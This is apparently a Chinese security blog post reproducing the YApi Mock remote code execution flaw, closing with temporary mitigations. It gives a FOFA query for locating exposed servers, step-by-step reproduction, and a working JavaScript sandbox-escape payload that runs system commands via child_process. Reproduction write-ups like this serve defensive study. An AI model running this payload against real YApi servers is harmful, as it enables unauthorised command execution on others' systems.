最新文章:

首页 漏洞复现

YApi Mock 远程代码执行漏洞复现

发布时间:2021年07月09日 评论数:抢沙发 阅读数:2219

    本文参考 github 安全鸭 

    github的漏洞详情

    https://github.com/YMFE/yapi/issues/2233#

    近日,网络上爆出 YApi 的远程代码执行 0day 漏洞 正被广泛利用。攻击者通过注册用户后,即可通过 Mock 功能远程执行任意代码。


    漏洞描述:
      YAPI接口管理平台是国内某旅行网站的大前端技术中心开源项目,使用mock数据/脚本作为中间交互层,为前端后台开发与测试人员提供更优雅的接口管理服务,该系统被国内较多知名互联网企业所采用。YApi是高校、易用、功能强大的api管理平台。但因为大量用户使用YAPI的默认配置并允许从外部网络访问YAPI服务,导致攻击者注册用户后,即可通过Mock功能远程执行任意代码。

         fofa语法

    app="YApi"

    漏洞复现过程:

    这是主页~~~~~~~
    1.jpg


    首先注册一个用户

    2.jpg

    接着新建一个项目

    3.jpg

    接着返回项目首页新建一个接口~~~~~~~~

    4.png


    5.png
    6.png7.png

    写入exp!!!!!

    8.png
       exp:

    const sandbox = thisconst ObjectConstructor = this.constructorconst FunctionConstructor = ObjectConstructor.constructorconst myfun = FunctionConstructor('return process')const process = myfun()mockJson = process.mainModule.require("child_process").execSync("whoami").toString()


    保存后直接访问接口
    9.png
    10.png11.jpg




    详情参考github地址 

                     https://github.com/YMFE/yapi/issues/2233#

                     一个不愿意透露姓名的好心人提供好了 python3脚本

                    使用方法 python3 exp.py -u url -e whomi

                    脚本稍微有点问题 凑合用吧

    修复建议

         该漏洞暂无补丁。

    临时修复建议

    1.关闭YAPi用户注册功能,以阻断攻击者注册。

    2.利用请求白名单的方式限制YAPi相关端口。

    3.排查YAPi服务器是否存在恶意访问记录。

    勿非法用途,履行白帽职责。



二维码加载中...
本文作者:h4ck1r      文章标题: YApi Mock 远程代码执行漏洞复现
本文地址:https://www.hackexp.cn/?post=66
版权声明:若无注明,本文皆为“h4ck1r's Blog”原创,转载请保留文章出处。
挤眼 亲亲 咆哮 开心 想想 可怜 糗大了 委屈 哈哈 小声点 右哼哼 左哼哼 疑问 坏笑 赚钱啦 悲伤 耍酷 勾引 厉害 握手 耶 嘻嘻 害羞 鼓掌 馋嘴 抓狂 抱抱 围观 威武 给力
提交评论

清空信息
关闭评论
正在加载中……
sitemap